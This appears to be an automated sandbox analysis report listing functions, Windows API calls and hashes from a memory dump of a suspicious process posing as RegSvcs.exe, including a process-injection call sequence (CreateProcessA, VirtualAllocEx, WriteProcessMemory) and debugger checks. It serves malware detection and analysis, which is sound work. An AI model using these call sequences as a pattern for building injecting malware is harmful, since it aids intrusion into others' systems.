                                                      • Instruction ID: a24e2a278018e4b14ecf551288e5960cc595b432ca505c8d4c5f1a48b880b77d
                                                      • Opcode Fuzzy Hash: 749dbd5d499d1470d264ec04480df794728a01329d0d6bbc761b316cee2ec38d
                                                      • Instruction Fuzzy Hash: 47414FB5900308ABDB24EFB6DC55AABBBF9EF4C710B00562EF556D3612E7349940CB24

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 0040C6D0 (node and edge data not reproduced)
                                                      APIs
                                                      • Sleep.KERNELBASE(00000096), ref: 0040C6D6
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00467494), ref: 0040C6F4
                                                      • GetLastError.KERNEL32 ref: 0040C6FC
                                                      • GetLastError.KERNEL32 ref: 0040C70D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CreateMutexSleep
                                                      • String ID:
                                                      • API String ID: 3645482037-0
                                                      • Opcode ID: 7bf80919f9e91dceb534b8465ab183818ec6dee3f15917d6dd5352bcdab66ccc
                                                      • Instruction ID: 05b33c329f834a101d1e8a6918923c0cc36b0f96f91a03b02b8734a619088f86
                                                      • Opcode Fuzzy Hash: 7bf80919f9e91dceb534b8465ab183818ec6dee3f15917d6dd5352bcdab66ccc
                                                      • Instruction Fuzzy Hash: 3BE01A30248341EBE7505B6CED8DB1F3A26D790B62F600535EA1AD75E7DB7988808A1E

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 0043ED89 (node and edge data not reproduced)
                                                      APIs
                                                      • _free.LIBCMT ref: 0043EE59
                                                        • Part of subcall function 0043EC2F: _free.LIBCMT ref: 0043EC8F
                                                        • Part of subcall function 0043EC2F: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0043EE50,?,?,00000000), ref: 0043ECA1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 597776487-0
                                                      • Opcode ID: 82eaa0d685ad11090675d34a3f10cb6465b1a0037b6e02a5c3dda1bb3ca6be4b
                                                      • Instruction ID: 73058ef59dd7046185ead80c26faa716bd819d22ba9cfe356290d376555c15a2
                                                      • Opcode Fuzzy Hash: 82eaa0d685ad11090675d34a3f10cb6465b1a0037b6e02a5c3dda1bb3ca6be4b
                                                      • Instruction Fuzzy Hash: 46212C7280131556CB20AB37DC4AA9B777CDF88324F11126FF465A32C2EF389D45895D

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 004306A4 (node and edge data not reproduced)
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41254b0cab8666a23a93eb46c529210e015b8c12debe9a9a25af724ae25d77a7
                                                      • Instruction ID: 61d7ac309e15a0dd2b1112fe8d0e6e541833381e3abde1be50b0bf788e8b099f
                                                      • Opcode Fuzzy Hash: 41254b0cab8666a23a93eb46c529210e015b8c12debe9a9a25af724ae25d77a7
                                                      • Instruction Fuzzy Hash: A3214B31500208BBEB107F699C42B9F37299F45778F204326F8347B2D1C778AE0596A9

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 0043097C (node and edge data not reproduced)
                                                      APIs
                                                      • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,004308B3,?,?,00000000,00000000), ref: 004309AA
                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,004308B3,?,?,00000000,00000000), ref: 004309BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$System$FileLocalSpecific
                                                      • String ID:
                                                      • API String ID: 1707611234-0
                                                      • Opcode ID: 083b45ba5e4f5ba8717be5abdb87d3da99cbf17a84dc3f54d2d5a640384f059b
                                                      • Instruction ID: e8b1224c30455b4454d1d7bc614790d12a5377c451a15f0158bb94fcca1467ba
                                                      • Opcode Fuzzy Hash: 083b45ba5e4f5ba8717be5abdb87d3da99cbf17a84dc3f54d2d5a640384f059b
                                                      • Instruction Fuzzy Hash: 77111CB290020CABDB00DF95C945BDFB7BCAF4C311F505367E516E6181EB34EA458B65

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040C6D0: Sleep.KERNELBASE(00000096), ref: 0040C6D6
                                                        • Part of subcall function 0040C6D0: CreateMutexA.KERNELBASE(00000000,00000000,00467494), ref: 0040C6F4
                                                        • Part of subcall function 0040C6D0: GetLastError.KERNEL32 ref: 0040C6FC
                                                        • Part of subcall function 0040C6D0: GetLastError.KERNEL32 ref: 0040C70D
                                                        • Part of subcall function 0041F4B0: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0041F592
                                                        • Part of subcall function 0041F4B0: RegCloseKey.KERNELBASE(80000002), ref: 0041F5A8
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 004067BD
                                                        • Part of subcall function 004061F0: RegQueryInfoKeyW.ADVAPI32 ref: 00406894
                                                      • CreateThread.KERNELBASE ref: 00420D90
                                                      • Sleep.KERNELBASE(00007530), ref: 00420DA5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastOpenSleep$CloseInfoMutexQueryThread
                                                      • String ID:
                                                      • API String ID: 2150463253-0
                                                      • Opcode ID: 9c5c56c67b97ed114369958bf5c8b56eb1ac444260a1130bafd3c3612b7511a9
                                                      • Instruction ID: 3b1eac4e0a60303c1dff9b400d2025ec4af11ec8799795f63c25612d63d1b09b
                                                      • Opcode Fuzzy Hash: 9c5c56c67b97ed114369958bf5c8b56eb1ac444260a1130bafd3c3612b7511a9
                                                      • Instruction Fuzzy Hash: C4E086317D4324A7E22037E26C07F9D39455B04F56FA40227B7092A0E39DDC358045AF

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 0040B250 (node and edge data not reproduced)
                                                      APIs
                                                      • GetComputerNameExW.KERNEL32(00000002,?,?,A99F1BC9,74DF0F00), ref: 0040B2A6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID:
                                                      • API String ID: 3545744682-0
                                                      • Opcode ID: 8935a04053b771ff7606a8fd0103d9a7a7e9d0e16d527a16f0351c7dd7226f59
                                                      • Instruction ID: 050d900616f6a6a152b7b8354c128e67105c74911c083c46fea7e7db7a4b0cf1
                                                      • Opcode Fuzzy Hash: 8935a04053b771ff7606a8fd0103d9a7a7e9d0e16d527a16f0351c7dd7226f59
                                                      • Instruction Fuzzy Hash: 5051A471A012289BCB20DF64DC887DDB7B4EF58314F5006EAD819A7291DB786F84CF99
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                      • Instruction ID: 35455fcf37491ee6bd69110a5b47a0bdc70de66d87c835a3063b810ddd23e912
                                                      • Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                      • Instruction Fuzzy Hash: E101AC71D04218AEDF01AFA99C027DE7FF49F88324F14416BF818E61D5EA748A60C78C
                                                      APIs
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                        • Part of subcall function 004061F0: RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                        • Part of subcall function 004061F0: RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                      • Sleep.KERNELBASE ref: 00420D75
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQuerySleepValue
                                                      • String ID:
                                                      • API String ID: 4119054056-0
                                                      • Opcode ID: 16fb6ca28f44bc769542cee678ba815e9a8f2471971720bd61ea7338c613dabc
                                                      • Instruction ID: bc7465baf16aac579654f4ee726a40ebde765d5b47a6fba71537ca3684cb7cf5
                                                      • Instruction Fuzzy Hash: B3F0F971B00214A7C700BBADDD0774D7B74E706B24F91036EE811672D3EA791A0447DB
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004293F3
                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00429401
                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00429412
                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00429423
                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00429434
                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00429445
                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00429456
                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00429467
                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00429478
                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00429489
                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0042949A
                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004294AB
                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004294BC
                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004294CD
                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004294DE
                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004294EF
                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00429500
                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00429511
                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00429522
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00429533
                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00429544
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00429555
                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00429566
                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00429577
                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00429588
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00429599
                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004295AA
                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 004295BB
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004295CC
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004295DD
                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 004295EE
                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 004295FF
                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00429610
                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00429621
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00429632
                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00429643
                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00429654
                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00429665
                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00429676
                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00429687
                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00429698
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                      • API String ID: 667068680-295688737
                                                      • Opcode ID: 4670dea31c1608621281fd21892e7f61742321bec9bdc48a4d0cc8c6a5f12e6a
                                                      • Instruction ID: 9db1d203b62b979cd5eac0c7f6a5698cb31e7315f3c9d30f48096ed1632c4aa7
                                                      • Instruction Fuzzy Hash: 3861AA71995360BBCB005FB4ED0DB563BA8BA1AB43324053FF901D25B6EBF980848B5D
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040809D
                                                      • CreateProcessA.KERNEL32 ref: 004080FB
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00408114
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00408129
                                                      • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00408149
                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040818B
                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004081A8
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408261
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                      • String ID: $VUUU$invalid stoi argument
                                                      • API String ID: 3796053839-3954507777
                                                      • Opcode ID: a6eeef2fa584c0b932229ef9536b32f5c55a64671cb7b4344f52a608015dc893
                                                      • Instruction ID: f041e695f941af7b06446caa1a3437145d5dac3473181cda5356b20cb1f842c2
                                                      • Instruction Fuzzy Hash: 9A417F70644701AFD7209B60DD05F967BE8BF88B05F00042AB784A62E0DBB4E954CB9A
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,004351D7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004421E7
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004351D7,?,?,?,00000055,?,-00000050,?,?), ref: 00442212
                                                      • _wcschr.LIBVCRUNTIME ref: 004422A6
                                                      • _wcschr.LIBVCRUNTIME ref: 004422B4
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00442375
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                      • String ID: utf8$aE
                                                      • API String ID: 4147378913-399719714
                                                      • Opcode ID: 5ec4bfb4ad63d56cc2308d790e3181faed87f106d0d47a9333c1811a31555170
                                                      • Instruction ID: 5f90f548c6c6e364996cf661ccd3f022b14e1a3cc5b38b91ab9d96edb2a47106
                                                      • Instruction Fuzzy Hash: 3971E971600305AAF724AF36CD46BAB73A8EF48704F54406BFA05D7281EAFCE941866D
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00442B93
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00442BDC
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00442BEB
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00442C33
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00442C52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                      • String ID: aE
                                                      • API String ID: 949163717-2657188709
                                                      • Opcode ID: 7700218cab09b4efaeec657f10b300e5570156f09a8e9f78ea85bd9c63e632fa
                                                      • Instruction ID: 65e7fc6fd7df5464d0980f18d4520dc5feb52c9ba4fd3c8b7b1ad039447ec695
                                                      • Instruction Fuzzy Hash: F7519371A00245AFEB10DFA5CD45ABF77B8FF48701F85446AF900E7291DBB8A904CB69
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00442BD0,00000002,00000000,?,?,?,00442BD0,?,00000000), ref: 0044294B
                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00442BD0,00000002,00000000,?,?,?,00442BD0,?,00000000), ref: 00442974
                                                      • GetACP.KERNEL32(?,?,00442BD0,?,00000000), ref: 00442989
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: da544cd987ee321140e620090b139fc81f4842a7e9bf52881ff3bc9f30605441
                                                      • Instruction ID: af570630598a51fa7b062114fab0c15fdc0e2c648eac9bf648b74f7d766c84de
                                                      • Instruction Fuzzy Hash: 7021C4A2B00105A7F7348F14CA00B9BB3A6AB58F54FDA4166F90AD7324EBB6DD41C75C
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042A4B1
                                                      • IsDebuggerPresent.KERNEL32 ref: 0042A57D
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042A59D
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0042A5A7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 7bc20087304dc69425af26d90172f719b7b3eaa424f4063a30b44ab8ff03e3c4
                                                      • Instruction ID: b10c2ea21ce6a5d2fe90161df8e04ace66a9c518b0087ce6fd1fcca5370ec2b0
                                                      • Instruction Fuzzy Hash: 28310775D013289BDB10DFA4D989BCDBBB8AF08705F5041EAE40DAB250EB759A848F49
                                                      APIs
                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,0042938F,00000000,?,?,?,004293C4,00412350,?,?,?,?,?,00428E68,00412350,00000001), ref: 004296C0
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,0042938F,00000000,?,?,?,004293C4,00412350,?,?,?,?,?,00428E68), ref: 004296C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$FileSystem$Precise
                                                      • String ID: p"B
                                                      • API String ID: 743729956-2496714718
                                                      • Opcode ID: 8ceba82b2ce19afb895b1dff61bc97c27ae05f57bebffb06c926b77f9a408463
                                                      • Instruction ID: 07f7e5af0bf60bc2275fd628d1950506e5c4dfde5ac2393f350775c1edb65769
                                                      • Instruction Fuzzy Hash: 56D02236601238978F016B80FC085ADBB98EF04B12B440077F90D93231CBA29C108BDE
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044258D
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004425D7
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044269D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 3140898709-0
                                                      • Opcode ID: 221d76c4318afbeaf3b95bd96d76aff6c49629ab69b412c2cc609c47c04b6745
                                                      • Instruction ID: 5ea523c0ed242e2d20e30eb55798ab89f0a1b679829d1e62418643baced88ba9
                                                      • Instruction Fuzzy Hash: 9A61B1716002179FEB28AF25DE82BAB77A8FF04310F51417BF905C6285E7B8D991CB58
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0042EF65
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0042EF6F
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0042EF7C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 32501adab060376cdc0181eeebb2595e17cb320e8dd61b08f52dd60b715bba26
                                                      • Instruction ID: f361088f0d4e0e4884128a2278aafb1a8dc27e766210c34af79892b09cc2d6a2
                                                      • Instruction Fuzzy Hash: 8231B574901228ABCB21DF65D98978DBBB8BF18714F5041EAE40CA6251E7749F818F49
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,0042DE5F,00000000,00000000,?,00000000,?,00438071), ref: 0042DE82
                                                      • TerminateProcess.KERNEL32(00000000,?,0042DE5F,00000000,00000000,?,00000000,?,00438071), ref: 0042DE89
                                                      • ExitProcess.KERNEL32 ref: 0042DE9B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 29340e7bfda7ad7b50886f96714fac72c92b3098ca6ce75e64e335c7c5e442b1
                                                      • Instruction ID: e84422aa0ee7f81a9c8f6ca0bf171272c4cc3621c8a04ca038815eaafff8090d
                                                      • Instruction Fuzzy Hash: 29E04631500618ABCB113B59EC08A5A3B29EB50342F428469F804DA232CB79DC81CA89
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00435D32,?,20001004,00000000,00000002,?,?,0043533F), ref: 00438A12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: p"B
                                                      • API String ID: 2299586839-2496714718
                                                      • Opcode ID: 32541793b72b530a81baa30765d9e49a508c946d45b2e2da03d61495df7fad4e
                                                      • Instruction ID: 189f04a6c4868017904d1405b1ea4af0b54d8d3c83b69fb18bb0939a9bfb30bf
                                                      • Instruction Fuzzy Hash: 5FE04F31540318BBCF126F61EC04EAEBF65EF48762F10402AFD0566231CF7A8921AADD
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0042A6A5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: ff96371d1ae292d9ada91ddf3d5dd7d0aad5fd29b9590dea8af1e6d6e4db4c05
